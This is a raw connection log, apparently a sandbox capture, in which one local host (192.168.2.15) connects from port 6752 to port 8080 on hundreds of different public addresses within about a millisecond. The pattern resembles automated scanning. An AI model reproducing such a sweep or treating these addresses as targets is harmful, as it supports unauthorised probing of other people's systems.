Feb 14, 2024 09:28:44.371826887 CET	6752	8080	192.168.2.15	95.226.115.179
Feb 14, 2024 09:28:44.371828079 CET	6752	8080	192.168.2.15	94.212.117.54
Feb 14, 2024 09:28:44.371828079 CET	6752	8080	192.168.2.15	85.207.90.30
Feb 14, 2024 09:28:44.371826887 CET	6752	8080	192.168.2.15	94.129.78.162
Feb 14, 2024 09:28:44.371828079 CET	6752	8080	192.168.2.15	94.15.177.240
Feb 14, 2024 09:28:44.371829987 CET	6752	8080	192.168.2.15	62.197.138.10
Feb 14, 2024 09:28:44.371829987 CET	6752	8080	192.168.2.15	95.123.237.61
Feb 14, 2024 09:28:44.371851921 CET	6752	8080	192.168.2.15	31.174.241.8
Feb 14, 2024 09:28:44.371851921 CET	6752	8080	192.168.2.15	31.163.110.42
Feb 14, 2024 09:28:44.371851921 CET	6752	8080	192.168.2.15	31.116.29.167
Feb 14, 2024 09:28:44.371854067 CET	6752	8080	192.168.2.15	62.174.254.48
Feb 14, 2024 09:28:44.371855021 CET	6752	8080	192.168.2.15	62.75.84.213
Feb 14, 2024 09:28:44.371855021 CET	6752	8080	192.168.2.15	31.124.81.163
Feb 14, 2024 09:28:44.371855021 CET	6752	8080	192.168.2.15	95.27.140.172
Feb 14, 2024 09:28:44.371855974 CET	6752	8080	192.168.2.15	94.17.49.96
Feb 14, 2024 09:28:44.371860981 CET	6752	8080	192.168.2.15	94.58.0.107
Feb 14, 2024 09:28:44.371860981 CET	6752	8080	192.168.2.15	62.191.144.233
Feb 14, 2024 09:28:44.371860981 CET	6752	8080	192.168.2.15	62.29.47.155
Feb 14, 2024 09:28:44.371860981 CET	6752	8080	192.168.2.15	85.203.210.63
Feb 14, 2024 09:28:44.371860981 CET	6752	8080	192.168.2.15	85.58.68.104
Feb 14, 2024 09:28:44.371860981 CET	6752	8080	192.168.2.15	62.248.86.223
Feb 14, 2024 09:28:44.371860981 CET	6752	8080	192.168.2.15	31.27.117.130
Feb 14, 2024 09:28:44.371882915 CET	6752	8080	192.168.2.15	94.243.125.240
Feb 14, 2024 09:28:44.371905088 CET	6752	8080	192.168.2.15	31.224.245.161
Feb 14, 2024 09:28:44.371905088 CET	6752	8080	192.168.2.15	31.128.0.57
Feb 14, 2024 09:28:44.371915102 CET	6752	8080	192.168.2.15	85.45.218.143
Feb 14, 2024 09:28:44.371915102 CET	6752	8080	192.168.2.15	85.48.71.17
Feb 14, 2024 09:28:44.371917009 CET	6752	8080	192.168.2.15	94.255.72.42
Feb 14, 2024 09:28:44.371917009 CET	6752	8080	192.168.2.15	85.198.168.95
Feb 14, 2024 09:28:44.371917009 CET	6752	8080	192.168.2.15	95.161.20.64
Feb 14, 2024 09:28:44.371917009 CET	6752	8080	192.168.2.15	62.223.149.171
Feb 14, 2024 09:28:44.371917009 CET	6752	8080	192.168.2.15	95.221.8.183
Feb 14, 2024 09:28:44.371917963 CET	6752	8080	192.168.2.15	62.190.201.12
Feb 14, 2024 09:28:44.371918917 CET	6752	8080	192.168.2.15	62.36.140.30
Feb 14, 2024 09:28:44.371917009 CET	6752	8080	192.168.2.15	62.93.169.119
Feb 14, 2024 09:28:44.371917963 CET	6752	8080	192.168.2.15	85.34.231.186
Feb 14, 2024 09:28:44.371917963 CET	6752	8080	192.168.2.15	85.160.35.22
Feb 14, 2024 09:28:44.371918917 CET	6752	8080	192.168.2.15	94.77.243.193
Feb 14, 2024 09:28:44.371938944 CET	6752	8080	192.168.2.15	85.185.215.135
Feb 14, 2024 09:28:44.371938944 CET	6752	8080	192.168.2.15	62.211.118.169
Feb 14, 2024 09:28:44.371944904 CET	6752	8080	192.168.2.15	95.95.155.130
Feb 14, 2024 09:28:44.371946096 CET	6752	8080	192.168.2.15	31.89.172.63
Feb 14, 2024 09:28:44.371947050 CET	6752	8080	192.168.2.15	95.47.226.95
Feb 14, 2024 09:28:44.371947050 CET	6752	8080	192.168.2.15	94.223.240.191
Feb 14, 2024 09:28:44.371947050 CET	6752	8080	192.168.2.15	95.63.187.51
Feb 14, 2024 09:28:44.371948004 CET	6752	8080	192.168.2.15	31.3.108.192
Feb 14, 2024 09:28:44.371948004 CET	6752	8080	192.168.2.15	94.91.115.199
Feb 14, 2024 09:28:44.371948004 CET	6752	8080	192.168.2.15	85.45.27.41
Feb 14, 2024 09:28:44.371949911 CET	6752	8080	192.168.2.15	94.255.188.120
Feb 14, 2024 09:28:44.371951103 CET	6752	8080	192.168.2.15	85.209.49.115
Feb 14, 2024 09:28:44.371949911 CET	6752	8080	192.168.2.15	85.198.252.53
Feb 14, 2024 09:28:44.371951103 CET	6752	8080	192.168.2.15	62.112.244.57
Feb 14, 2024 09:28:44.371951103 CET	6752	8080	192.168.2.15	95.254.147.36
Feb 14, 2024 09:28:44.371951103 CET	6752	8080	192.168.2.15	94.166.4.39
Feb 14, 2024 09:28:44.371951103 CET	6752	8080	192.168.2.15	85.119.136.197
Feb 14, 2024 09:28:44.371953011 CET	6752	8080	192.168.2.15	62.216.167.249
Feb 14, 2024 09:28:44.371953011 CET	6752	8080	192.168.2.15	85.110.215.108
Feb 14, 2024 09:28:44.371953011 CET	6752	8080	192.168.2.15	31.45.110.184
Feb 14, 2024 09:28:44.371953011 CET	6752	8080	192.168.2.15	94.19.1.192
Feb 14, 2024 09:28:44.371961117 CET	6752	8080	192.168.2.15	94.248.250.108
Feb 14, 2024 09:28:44.371961117 CET	6752	8080	192.168.2.15	31.181.227.16
Feb 14, 2024 09:28:44.371961117 CET	6752	8080	192.168.2.15	94.21.84.107
Feb 14, 2024 09:28:44.371961117 CET	6752	8080	192.168.2.15	94.43.39.238
Feb 14, 2024 09:28:44.371961117 CET	6752	8080	192.168.2.15	94.186.40.173
Feb 14, 2024 09:28:44.371965885 CET	6752	8080	192.168.2.15	85.174.91.188
Feb 14, 2024 09:28:44.371998072 CET	6752	8080	192.168.2.15	85.119.213.240
Feb 14, 2024 09:28:44.371998072 CET	6752	8080	192.168.2.15	31.164.201.94
Feb 14, 2024 09:28:44.371999979 CET	6752	8080	192.168.2.15	31.207.103.97
Feb 14, 2024 09:28:44.371999979 CET	6752	8080	192.168.2.15	62.140.106.66
Feb 14, 2024 09:28:44.371999979 CET	6752	8080	192.168.2.15	85.119.154.79
Feb 14, 2024 09:28:44.372000933 CET	6752	8080	192.168.2.15	62.85.192.75
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	62.55.183.131
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	31.146.40.53
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	94.243.73.181
Feb 14, 2024 09:28:44.372004032 CET	6752	8080	192.168.2.15	94.155.241.237
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	85.54.8.178
Feb 14, 2024 09:28:44.372004986 CET	6752	8080	192.168.2.15	31.76.238.219
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	95.47.159.243
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	31.97.149.146
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	85.56.148.43
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	94.202.8.206
Feb 14, 2024 09:28:44.372004986 CET	6752	8080	192.168.2.15	31.193.232.248
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	85.200.42.185
Feb 14, 2024 09:28:44.372001886 CET	6752	8080	192.168.2.15	94.91.72.54
Feb 14, 2024 09:28:44.372015953 CET	6752	8080	192.168.2.15	85.255.68.247
Feb 14, 2024 09:28:44.372019053 CET	6752	8080	192.168.2.15	31.134.155.100
Feb 14, 2024 09:28:44.372019053 CET	6752	8080	192.168.2.15	94.111.170.67
Feb 14, 2024 09:28:44.372015953 CET	6752	8080	192.168.2.15	94.235.95.149
Feb 14, 2024 09:28:44.372020960 CET	6752	8080	192.168.2.15	62.6.55.106
Feb 14, 2024 09:28:44.372020960 CET	6752	8080	192.168.2.15	85.4.171.97
Feb 14, 2024 09:28:44.372029066 CET	6752	8080	192.168.2.15	85.245.120.105
Feb 14, 2024 09:28:44.372029066 CET	6752	8080	192.168.2.15	85.211.50.239
Feb 14, 2024 09:28:44.372031927 CET	6752	8080	192.168.2.15	62.224.22.110
Feb 14, 2024 09:28:44.372031927 CET	6752	8080	192.168.2.15	95.108.215.0
Feb 14, 2024 09:28:44.372031927 CET	6752	8080	192.168.2.15	95.130.94.225
Feb 14, 2024 09:28:44.372037888 CET	6752	8080	192.168.2.15	94.42.195.215
Feb 14, 2024 09:28:44.372037888 CET	6752	8080	192.168.2.15	31.227.162.113
Feb 14, 2024 09:28:44.372037888 CET	6752	8080	192.168.2.15	95.202.107.201
Feb 14, 2024 09:28:44.372040033 CET	6752	8080	192.168.2.15	31.54.134.202
Feb 14, 2024 09:28:44.372056961 CET	6752	8080	192.168.2.15	85.96.176.195
Feb 14, 2024 09:28:44.372056961 CET	6752	8080	192.168.2.15	62.60.49.159
Feb 14, 2024 09:28:44.372056961 CET	6752	8080	192.168.2.15	85.78.182.210
Feb 14, 2024 09:28:44.372056961 CET	6752	8080	192.168.2.15	95.141.246.71
Feb 14, 2024 09:28:44.372061968 CET	6752	8080	192.168.2.15	95.43.239.21
Feb 14, 2024 09:28:44.372061968 CET	6752	8080	192.168.2.15	85.201.127.106
Feb 14, 2024 09:28:44.372061968 CET	6752	8080	192.168.2.15	85.112.169.165
Feb 14, 2024 09:28:44.372064114 CET	6752	8080	192.168.2.15	62.12.223.147
Feb 14, 2024 09:28:44.372061968 CET	6752	8080	192.168.2.15	94.44.113.187
Feb 14, 2024 09:28:44.372065067 CET	6752	8080	192.168.2.15	95.227.240.255
Feb 14, 2024 09:28:44.372061968 CET	6752	8080	192.168.2.15	95.227.223.127
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	95.95.76.101
Feb 14, 2024 09:28:44.372061968 CET	6752	8080	192.168.2.15	85.236.131.160
Feb 14, 2024 09:28:44.372065067 CET	6752	8080	192.168.2.15	31.187.58.27
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	62.134.219.169
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	95.205.168.151
Feb 14, 2024 09:28:44.372065067 CET	6752	8080	192.168.2.15	95.238.198.98
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	31.78.254.110
Feb 14, 2024 09:28:44.372070074 CET	6752	8080	192.168.2.15	85.116.225.50
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	95.213.250.15
Feb 14, 2024 09:28:44.372070074 CET	6752	8080	192.168.2.15	95.152.157.121
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	31.127.214.233
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	94.238.226.147
Feb 14, 2024 09:28:44.372070074 CET	6752	8080	192.168.2.15	62.19.148.255
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	95.220.189.136
Feb 14, 2024 09:28:44.372081041 CET	6752	8080	192.168.2.15	62.236.155.81
Feb 14, 2024 09:28:44.372070074 CET	6752	8080	192.168.2.15	31.203.142.160
Feb 14, 2024 09:28:44.372081041 CET	6752	8080	192.168.2.15	62.86.47.163
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	62.62.123.153
Feb 14, 2024 09:28:44.372066975 CET	6752	8080	192.168.2.15	95.117.53.186
Feb 14, 2024 09:28:44.372067928 CET	6752	8080	192.168.2.15	95.116.251.225
Feb 14, 2024 09:28:44.372067928 CET	6752	8080	192.168.2.15	95.106.34.108
Feb 14, 2024 09:28:44.372102022 CET	6752	8080	192.168.2.15	94.255.207.82
Feb 14, 2024 09:28:44.372102022 CET	6752	8080	192.168.2.15	31.165.243.29
Feb 14, 2024 09:28:44.372109890 CET	6752	8080	192.168.2.15	31.226.52.70
Feb 14, 2024 09:28:44.372109890 CET	6752	8080	192.168.2.15	95.122.20.68
Feb 14, 2024 09:28:44.372119904 CET	6752	8080	192.168.2.15	85.58.220.25
Feb 14, 2024 09:28:44.372119904 CET	6752	8080	192.168.2.15	95.137.193.93
Feb 14, 2024 09:28:44.372138023 CET	6752	8080	192.168.2.15	62.140.246.19
Feb 14, 2024 09:28:44.372138023 CET	6752	8080	192.168.2.15	94.253.95.207
Feb 14, 2024 09:28:44.372139931 CET	6752	8080	192.168.2.15	85.139.194.58
Feb 14, 2024 09:28:44.372139931 CET	6752	8080	192.168.2.15	95.183.167.198
Feb 14, 2024 09:28:44.372140884 CET	6752	8080	192.168.2.15	95.252.138.120
Feb 14, 2024 09:28:44.372140884 CET	6752	8080	192.168.2.15	94.1.169.149
Feb 14, 2024 09:28:44.372142076 CET	6752	8080	192.168.2.15	95.44.248.231
Feb 14, 2024 09:28:44.372140884 CET	6752	8080	192.168.2.15	31.141.76.95
Feb 14, 2024 09:28:44.372142076 CET	6752	8080	192.168.2.15	31.25.137.86
Feb 14, 2024 09:28:44.372140884 CET	6752	8080	192.168.2.15	94.174.125.153
Feb 14, 2024 09:28:44.372143984 CET	6752	8080	192.168.2.15	85.217.199.171
Feb 14, 2024 09:28:44.372159004 CET	6752	8080	192.168.2.15	62.178.241.60
Feb 14, 2024 09:28:44.372159958 CET	6752	8080	192.168.2.15	85.56.139.77
Feb 14, 2024 09:28:44.372159004 CET	6752	8080	192.168.2.15	85.49.223.189
Feb 14, 2024 09:28:44.372159958 CET	6752	8080	192.168.2.15	94.117.195.2
Feb 14, 2024 09:28:44.372159958 CET	6752	8080	192.168.2.15	85.6.118.243
Feb 14, 2024 09:28:44.372167110 CET	6752	8080	192.168.2.15	94.58.214.248
Feb 14, 2024 09:28:44.372168064 CET	6752	8080	192.168.2.15	85.240.113.242
Feb 14, 2024 09:28:44.372167110 CET	6752	8080	192.168.2.15	62.170.17.209
Feb 14, 2024 09:28:44.372168064 CET	6752	8080	192.168.2.15	31.236.51.177
Feb 14, 2024 09:28:44.372169018 CET	6752	8080	192.168.2.15	85.76.146.181
Feb 14, 2024 09:28:44.372167110 CET	6752	8080	192.168.2.15	62.201.209.22
Feb 14, 2024 09:28:44.372169018 CET	6752	8080	192.168.2.15	85.96.138.65
Feb 14, 2024 09:28:44.372168064 CET	6752	8080	192.168.2.15	85.224.49.65
Feb 14, 2024 09:28:44.372169018 CET	6752	8080	192.168.2.15	85.134.137.174
Feb 14, 2024 09:28:44.372168064 CET	6752	8080	192.168.2.15	95.186.153.199
Feb 14, 2024 09:28:44.372168064 CET	6752	8080	192.168.2.15	94.46.219.157
Feb 14, 2024 09:28:44.372179985 CET	6752	8080	192.168.2.15	31.35.219.65
Feb 14, 2024 09:28:44.372193098 CET	6752	8080	192.168.2.15	31.156.216.214
Feb 14, 2024 09:28:44.372195959 CET	6752	8080	192.168.2.15	95.138.107.150
Feb 14, 2024 09:28:44.372195959 CET	6752	8080	192.168.2.15	31.19.144.150
Feb 14, 2024 09:28:44.372195959 CET	6752	8080	192.168.2.15	94.112.221.168
Feb 14, 2024 09:28:44.372195959 CET	6752	8080	192.168.2.15	62.105.132.133
Feb 14, 2024 09:28:44.372195959 CET	6752	8080	192.168.2.15	95.149.231.156
Feb 14, 2024 09:28:44.372195959 CET	6752	8080	192.168.2.15	31.126.161.114
Feb 14, 2024 09:28:44.372195959 CET	6752	8080	192.168.2.15	95.85.40.182
Feb 14, 2024 09:28:44.372195959 CET	6752	8080	192.168.2.15	95.121.243.155
Feb 14, 2024 09:28:44.372217894 CET	6752	8080	192.168.2.15	94.103.14.80
Feb 14, 2024 09:28:44.372217894 CET	6752	8080	192.168.2.15	85.202.199.105
Feb 14, 2024 09:28:44.372217894 CET	6752	8080	192.168.2.15	31.130.177.212
Feb 14, 2024 09:28:44.372220039 CET	6752	8080	192.168.2.15	95.19.154.187
Feb 14, 2024 09:28:44.372220039 CET	6752	8080	192.168.2.15	31.175.46.255
Feb 14, 2024 09:28:44.372220993 CET	6752	8080	192.168.2.15	62.119.38.222
Feb 14, 2024 09:28:44.372220039 CET	6752	8080	192.168.2.15	85.209.221.250
Feb 14, 2024 09:28:44.372220993 CET	6752	8080	192.168.2.15	95.191.29.119
Feb 14, 2024 09:28:44.372220993 CET	6752	8080	192.168.2.15	95.119.10.239
Feb 14, 2024 09:28:44.372220993 CET	6752	8080	192.168.2.15	94.119.58.235
Feb 14, 2024 09:28:44.372220993 CET	6752	8080	192.168.2.15	85.126.188.49
Feb 14, 2024 09:28:44.372220993 CET	6752	8080	192.168.2.15	31.162.81.201
Feb 14, 2024 09:28:44.372220993 CET	6752	8080	192.168.2.15	95.225.166.150
Feb 14, 2024 09:28:44.372237921 CET	6752	8080	192.168.2.15	94.25.242.229
Feb 14, 2024 09:28:44.372237921 CET	6752	8080	192.168.2.15	85.206.81.249
Feb 14, 2024 09:28:44.372237921 CET	6752	8080	192.168.2.15	85.224.12.238
Feb 14, 2024 09:28:44.372261047 CET	6752	8080	192.168.2.15	85.66.27.177
Feb 14, 2024 09:28:44.372261047 CET	6752	8080	192.168.2.15	85.26.144.196
Feb 14, 2024 09:28:44.372261047 CET	6752	8080	192.168.2.15	94.179.47.41
Feb 14, 2024 09:28:44.372261047 CET	6752	8080	192.168.2.15	62.154.25.11
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	95.141.241.97
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	85.42.44.24
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	94.99.101.0
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	94.128.209.80
Feb 14, 2024 09:28:44.372273922 CET	6752	8080	192.168.2.15	31.18.111.241
Feb 14, 2024 09:28:44.372275114 CET	6752	8080	192.168.2.15	85.54.182.77
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	62.216.21.98
Feb 14, 2024 09:28:44.372275114 CET	6752	8080	192.168.2.15	94.249.67.123
Feb 14, 2024 09:28:44.372273922 CET	6752	8080	192.168.2.15	94.56.206.82
Feb 14, 2024 09:28:44.372275114 CET	6752	8080	192.168.2.15	94.46.100.8
Feb 14, 2024 09:28:44.372277975 CET	6752	8080	192.168.2.15	62.166.126.111
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	31.123.192.212
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	31.244.156.15
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	31.33.90.13
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	62.4.182.134
Feb 14, 2024 09:28:44.372277975 CET	6752	8080	192.168.2.15	95.112.28.97
Feb 14, 2024 09:28:44.372279882 CET	6752	8080	192.168.2.15	31.40.11.24
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	94.41.213.249
Feb 14, 2024 09:28:44.372275114 CET	6752	8080	192.168.2.15	31.29.27.245
Feb 14, 2024 09:28:44.372277975 CET	6752	8080	192.168.2.15	31.1.170.158
Feb 14, 2024 09:28:44.372273922 CET	6752	8080	192.168.2.15	62.0.194.205
Feb 14, 2024 09:28:44.372279882 CET	6752	8080	192.168.2.15	85.181.211.82
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	62.171.13.191
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	62.63.129.214
Feb 14, 2024 09:28:44.372273922 CET	6752	8080	192.168.2.15	31.212.97.116
Feb 14, 2024 09:28:44.372272968 CET	6752	8080	192.168.2.15	94.75.106.73
Feb 14, 2024 09:28:44.372275114 CET	6752	8080	192.168.2.15	94.171.145.157
Feb 14, 2024 09:28:44.372279882 CET	6752	8080	192.168.2.15	95.204.32.20
Feb 14, 2024 09:28:44.372275114 CET	6752	8080	192.168.2.15	85.239.174.238
Feb 14, 2024 09:28:44.372279882 CET	6752	8080	192.168.2.15	31.71.116.59
Feb 14, 2024 09:28:44.372279882 CET	6752	8080	192.168.2.15	85.173.123.180
Feb 14, 2024 09:28:44.372279882 CET	6752	8080	192.168.2.15	94.43.15.247
Feb 14, 2024 09:28:44.372279882 CET	6752	8080	192.168.2.15	31.195.242.3
Feb 14, 2024 09:28:44.372279882 CET	6752	8080	192.168.2.15	31.157.239.92
Feb 14, 2024 09:28:44.372314930 CET	6752	8080	192.168.2.15	95.10.35.26
Feb 14, 2024 09:28:44.372314930 CET	6752	8080	192.168.2.15	95.92.73.77
Feb 14, 2024 09:28:44.372318029 CET	6752	8080	192.168.2.15	62.222.87.127
Feb 14, 2024 09:28:44.372318029 CET	6752	8080	192.168.2.15	85.143.232.222
Feb 14, 2024 09:28:44.372318029 CET	6752	8080	192.168.2.15	85.133.209.102
Feb 14, 2024 09:28:44.372318029 CET	6752	8080	192.168.2.15	85.24.196.133
Feb 14, 2024 09:28:44.372318029 CET	6752	8080	192.168.2.15	85.189.148.170
Feb 14, 2024 09:28:44.372323036 CET	6752	8080	192.168.2.15	62.67.234.53
Feb 14, 2024 09:28:44.372323036 CET	6752	8080	192.168.2.15	31.180.50.9
Feb 14, 2024 09:28:44.372323036 CET	6752	8080	192.168.2.15	94.73.240.112
Feb 14, 2024 09:28:44.372323036 CET	6752	8080	192.168.2.15	62.75.41.213
Feb 14, 2024 09:28:44.372323036 CET	6752	8080	192.168.2.15	85.172.182.53
Feb 14, 2024 09:28:44.372323036 CET	6752	8080	192.168.2.15	94.180.75.35
Feb 14, 2024 09:28:44.372339010 CET	6752	8080	192.168.2.15	95.235.164.98
Feb 14, 2024 09:28:44.372374058 CET	6752	8080	192.168.2.15	85.212.250.70
Feb 14, 2024 09:28:44.372374058 CET	6752	8080	192.168.2.15	31.189.204.32
Feb 14, 2024 09:28:44.372374058 CET	6752	8080	192.168.2.15	31.254.203.177
Feb 14, 2024 09:28:44.372374058 CET	6752	8080	192.168.2.15	31.79.178.83
Feb 14, 2024 09:28:44.372374058 CET	6752	8080	192.168.2.15	85.83.40.149
Feb 14, 2024 09:28:44.372374058 CET	6752	8080	192.168.2.15	95.204.213.123
Feb 14, 2024 09:28:44.372381926 CET	6752	8080	192.168.2.15	94.26.153.44
Feb 14, 2024 09:28:44.372381926 CET	6752	8080	192.168.2.15	94.55.136.70
Feb 14, 2024 09:28:44.372381926 CET	6752	8080	192.168.2.15	62.86.175.26
Feb 14, 2024 09:28:44.372381926 CET	6752	8080	192.168.2.15	94.197.227.59
Feb 14, 2024 09:28:44.372387886 CET	6752	8080	192.168.2.15	85.18.125.165
Feb 14, 2024 09:28:44.372387886 CET	6752	8080	192.168.2.15	94.0.81.210
Feb 14, 2024 09:28:44.372387886 CET	6752	8080	192.168.2.15	31.77.9.174
Feb 14, 2024 09:28:44.372389078 CET	6752	8080	192.168.2.15	31.179.15.74
Feb 14, 2024 09:28:44.372395992 CET	6752	8080	192.168.2.15	62.124.115.163
Feb 14, 2024 09:28:44.372395992 CET	6752	8080	192.168.2.15	31.167.245.179
Feb 14, 2024 09:28:44.372395992 CET	6752	8080	192.168.2.15	85.212.87.116
Feb 14, 2024 09:28:44.372395992 CET	6752	8080	192.168.2.15	95.207.247.93
Feb 14, 2024 09:28:44.372395992 CET	6752	8080	192.168.2.15	62.9.40.107
Feb 14, 2024 09:28:44.372395992 CET	6752	8080	192.168.2.15	31.193.10.171
Feb 14, 2024 09:28:44.372395992 CET	6752	8080	192.168.2.15	62.168.1.142
Feb 14, 2024 09:28:44.372395992 CET	6752	8080	192.168.2.15	62.213.106.76
Feb 14, 2024 09:28:44.372402906 CET	6752	8080	192.168.2.15	94.78.233.165
Feb 14, 2024 09:28:44.372402906 CET	6752	8080	192.168.2.15	62.140.94.252
Feb 14, 2024 09:28:44.372404099 CET	6752	8080	192.168.2.15	95.120.89.197
Feb 14, 2024 09:28:44.372402906 CET	6752	8080	192.168.2.15	62.47.213.27
Feb 14, 2024 09:28:44.372404099 CET	6752	8080	192.168.2.15	62.104.100.24
Feb 14, 2024 09:28:44.372402906 CET	6752	8080	192.168.2.15	95.128.4.203
Feb 14, 2024 09:28:44.372404099 CET	6752	8080	192.168.2.15	94.190.29.67
Feb 14, 2024 09:28:44.372402906 CET	6752	8080	192.168.2.15	31.27.247.244
Feb 14, 2024 09:28:44.372404099 CET	6752	8080	192.168.2.15	31.217.251.51
Feb 14, 2024 09:28:44.372402906 CET	6752	8080	192.168.2.15	94.21.212.243
Feb 14, 2024 09:28:44.372404099 CET	6752	8080	192.168.2.15	62.70.193.71
Feb 14, 2024 09:28:44.372402906 CET	6752	8080	192.168.2.15	85.225.67.14
Feb 14, 2024 09:28:44.372404099 CET	6752	8080	192.168.2.15	85.27.40.78
Feb 14, 2024 09:28:44.372402906 CET	6752	8080	192.168.2.15	85.118.155.174
Feb 14, 2024 09:28:44.372405052 CET	6752	8080	192.168.2.15	95.123.175.4
Feb 14, 2024 09:28:44.372405052 CET	6752	8080	192.168.2.15	94.192.25.44
Feb 14, 2024 09:28:44.372417927 CET	6752	8080	192.168.2.15	95.40.21.8
Feb 14, 2024 09:28:44.372425079 CET	6752	8080	192.168.2.15	94.162.99.185
Feb 14, 2024 09:28:44.372425079 CET	6752	8080	192.168.2.15	95.213.111.20
Feb 14, 2024 09:28:44.372425079 CET	6752	8080	192.168.2.15	95.134.80.156
Feb 14, 2024 09:28:44.372431040 CET	6752	8080	192.168.2.15	31.157.24.199
Feb 14, 2024 09:28:44.372431040 CET	6752	8080	192.168.2.15	85.158.214.56
Feb 14, 2024 09:28:44.372431040 CET	6752	8080	192.168.2.15	95.86.162.140
Feb 14, 2024 09:28:44.372431040 CET	6752	8080	192.168.2.15	95.206.194.130
Feb 14, 2024 09:28:44.372431040 CET	6752	8080	192.168.2.15	94.167.115.70
Feb 14, 2024 09:28:44.372440100 CET	6752	8080	192.168.2.15	31.243.188.218
Feb 14, 2024 09:28:44.372440100 CET	6752	8080	192.168.2.15	62.221.146.42
Feb 14, 2024 09:28:44.372440100 CET	6752	8080	192.168.2.15	95.221.37.75
Feb 14, 2024 09:28:44.372440100 CET	6752	8080	192.168.2.15	62.71.248.244
Feb 14, 2024 09:28:44.372440100 CET	6752	8080	192.168.2.15	31.120.252.14
Feb 14, 2024 09:28:44.372440100 CET	6752	8080	192.168.2.15	31.148.115.138
Feb 14, 2024 09:28:44.372440100 CET	6752	8080	192.168.2.15	62.86.160.159
Feb 14, 2024 09:28:44.372452974 CET	6752	8080	192.168.2.15	85.148.217.166
Feb 14, 2024 09:28:44.372453928 CET	6752	8080	192.168.2.15	31.147.106.72
Feb 14, 2024 09:28:44.372453928 CET	6752	8080	192.168.2.15	85.182.142.24
Feb 14, 2024 09:28:44.372452974 CET	6752	8080	192.168.2.15	85.86.240.112
Feb 14, 2024 09:28:44.372458935 CET	6752	8080	192.168.2.15	85.43.173.10
Feb 14, 2024 09:28:44.372453928 CET	6752	8080	192.168.2.15	31.196.42.56
Feb 14, 2024 09:28:44.372458935 CET	6752	8080	192.168.2.15	62.136.217.189
Feb 14, 2024 09:28:44.372453928 CET	6752	8080	192.168.2.15	62.81.1.111
Feb 14, 2024 09:28:44.372452974 CET	6752	8080	192.168.2.15	85.246.72.43
Feb 14, 2024 09:28:44.372458935 CET	6752	8080	192.168.2.15	62.182.119.44
Feb 14, 2024 09:28:44.372452974 CET	6752	8080	192.168.2.15	85.64.144.60
Feb 14, 2024 09:28:44.372458935 CET	6752	8080	192.168.2.15	31.103.162.18
Feb 14, 2024 09:28:44.372490883 CET	6752	8080	192.168.2.15	31.119.78.48
Feb 14, 2024 09:28:44.372490883 CET	6752	8080	192.168.2.15	31.212.181.81
Feb 14, 2024 09:28:44.372490883 CET	6752	8080	192.168.2.15	31.215.195.233
Feb 14, 2024 09:28:44.372490883 CET	6752	8080	192.168.2.15	85.172.69.70
Feb 14, 2024 09:28:44.372490883 CET	6752	8080	192.168.2.15	31.154.75.216
Feb 14, 2024 09:28:44.372490883 CET	6752	8080	192.168.2.15	62.104.43.4
Feb 14, 2024 09:28:44.372490883 CET	6752	8080	192.168.2.15	85.82.243.143
Feb 14, 2024 09:28:44.372490883 CET	6752	8080	192.168.2.15	31.154.87.210
Feb 14, 2024 09:28:44.372502089 CET	6752	8080	192.168.2.15	95.209.121.171
Feb 14, 2024 09:28:44.372502089 CET	6752	8080	192.168.2.15	85.65.235.169
Feb 14, 2024 09:28:44.372502089 CET	6752	8080	192.168.2.15	31.41.217.113
Feb 14, 2024 09:28:44.372502089 CET	6752	8080	192.168.2.15	95.10.248.25
Feb 14, 2024 09:28:44.372503042 CET	6752	8080	192.168.2.15	85.229.31.154
Feb 14, 2024 09:28:44.372503042 CET	6752	8080	192.168.2.15	94.132.233.214
Feb 14, 2024 09:28:44.372503042 CET	6752	8080	192.168.2.15	94.68.125.220
Feb 14, 2024 09:28:44.372503042 CET	6752	8080	192.168.2.15	95.124.111.85
Feb 14, 2024 09:28:44.372514963 CET	6752	8080	192.168.2.15	62.173.81.178
Feb 14, 2024 09:28:44.372514963 CET	6752	8080	192.168.2.15	62.100.190.41
Feb 14, 2024 09:28:44.372517109 CET	6752	8080	192.168.2.15	94.155.233.55
Feb 14, 2024 09:28:44.372517109 CET	6752	8080	192.168.2.15	31.25.102.93
Feb 14, 2024 09:28:44.372517109 CET	6752	8080	192.168.2.15	62.148.206.187
Feb 14, 2024 09:28:44.372517109 CET	6752	8080	192.168.2.15	95.107.55.22
Feb 14, 2024 09:28:44.372517109 CET	6752	8080	192.168.2.15	62.170.49.157
Feb 14, 2024 09:28:44.372517109 CET	6752	8080	192.168.2.15	62.92.29.186
Feb 14, 2024 09:28:44.372517109 CET	6752	8080	192.168.2.15	95.16.49.165
